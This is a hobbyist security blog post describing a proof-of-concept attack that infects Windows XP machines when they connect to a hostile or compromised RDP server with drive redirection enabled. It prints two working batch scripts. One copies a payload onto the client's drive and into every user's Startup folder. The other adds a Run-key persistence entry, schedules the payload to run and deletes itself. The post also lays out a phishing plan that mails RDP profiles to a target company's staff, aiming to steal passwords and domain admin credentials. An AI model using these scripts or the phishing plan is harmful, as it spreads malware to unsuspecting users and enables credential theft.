Attacking the RDP clients
Hi, Welcome to my first attempt at something bloggish.
I have been doing some more playing with Terminal Services or RDP what ever you want to call it. I have done a bunch of video's with this blog which I try and explain over the top so I don't have to write lots of information and miss things out or have people bitching at my grammar!! :)
Anyway, this is my current work in progress / proof of concept on attacking clients that connect to your terminal server. As you might remember from my Bsides talk I shown how a restrict user can gain local admin rights on your RDP box. I went on to explain how s/he could attack the rest of the network.. I felt like a twat saying that to people who know this.
I got my thinking cap on, and thought about finding a way to attack the clients, why attack the clients you say well. 1) The machines that connect to your terminal server are not linked to your security policy, for example personal machines or machines from other domains can still connect in. 2) User who user corporate machines will probably keep their personal stuff local to their machine, this could include password lists. 3) I can capture their passwords for other website / applications.. what if I capture the domain admin.
You get my drift what I am getting at, there are lots of reason to attack the clients who connect. Also, remember these users will trust this RDP server as they believe it is secure!!
So you probably guess what I am going to show you. I am going to show you can infect users connecting to an RDP server that I am in control off. But I faced three problems to get around: 1) Each machine that connects to the Terminal Server has a different name. 2) How do I copy files onto my target machine 3) How do I get the malicious file to execute!! I am now going to talk the rough basic of connecting into terminal services.
Here is a rough overview of RDP and what is required to make this attack work You probably don't need to watch this LOL!
Video 1OK!! You got me, this isn't a 0day attack but I am still investigating if I can do this, anybody has any ideas on this please let me know.
You need to enable drive redirection, and yes it's not on by default. But if a users enable drive redirection it stays on. So if you end users don't have it on then this attack wont work :( But don't worry.. I have a plan.
Video 2As you see, we have an option.. here is a scenario: - I target company ABC can create a RDP server with that domain. - I create a RDP profile link to that with a stored username / password. - I find the email format of company ABC i.e. first.last@abc.com - I send out lots of phising emails, with the attached RDP profile asking users to connect into the server to access the latest stuff. - Sit back and wait, people don't expect RDP as phising, :)
Anyway. Lets get back to the attack. I am going to talk you through prepping your newly hacked terminal server!!
Video 3Here is the code: new.bat ------------------------------ @echo off net use z: /delete net use z: \\tsclient\c xcopy c:\test\wc.exe "Z:\windows\" /Y xcopy c:\test\1st.bat "z:\Documents and Settings\All Users\Start Menu\Programs\Startup" /Y /i if errorlevel 4 goto test if errorlevel 0 goto exit :test z: cd "documents and settings" for /d %%a in (*) do xcopy /Y /I c:\test\wc.exe "z:\documents and settings\%%a\Start Menu\Programs\Startup\" net use z: /delete exit :exit net use z: /delete exit ------------------------------
And here is the 1st.bat
------------------------------
@echo off
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Updates /t REG_SZ /d C:\Windows\WC.exe
set h=%time:~0,2%
set m=%time:~3,2%
set /a m2=%m%+1
at %h%:%m2% c:\windows\wc.exe
at %h%:%m2% cmd /c del "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\1st.bat"
exit
------------------------------
Remember the code might of wrap around, you will have add or change things if your attack windows 7 for example, this is a PoC so it's against XP. Ok, the server is primed!! :) All we need is someone to connect to it! I am going to connect in with two users so you can see the effect of both.. first will be the restricted user, and second will be a user with admin rights.
Video 4Ok.. That's it. I hoped you enjoyed it. TTFN Wicked Clown